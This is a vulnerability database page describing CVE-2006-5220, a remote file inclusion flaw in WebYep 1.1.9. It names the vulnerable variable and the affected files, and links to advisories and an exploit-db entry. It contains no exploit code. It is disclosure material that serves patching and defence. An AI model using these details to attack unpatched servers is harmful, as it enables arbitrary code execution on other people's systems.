PHP Remote File Inclusion Vulnerability in WebYep by Obdev
CVE-2006-5220

Currently unrated

Key Information:

Vendor

Objective Development

Status
Webyep
Vendor
CVE Published:
10 October 2006

What is CVE-2006-5220?

WebYep 1.1.9 has multiple vulnerabilities related to remote file inclusion due to insecure handling of the 'webyep_sIncludePath' variable when 'register_globals' is enabled. This flaw allows remote attackers to exploit specific PHP files located in the 'programm/lib/' and 'programm/elements/' directories, as well as 'programm/webyep.php', leading to the possibility of executing arbitrary PHP code on the affected server. It highlights the critical need for web applications to implement secure coding practices and properly configure their settings to mitigate such risks.

References

http://securityreason.com/securityalert/1702
third-party-advisoryx_refsource_SREASON
https://www.exploit-db.com/exploits/2496
exploitx_refsource_EXPLOIT-DB
http://www.osvdb.org/29654
vdb-entryx_refsource_OSVDB

EPSS Score

10% chance of being exploited in the next 30 days.

Timeline

  • Vulnerability published

  • Vulnerability Reserved

JSON
.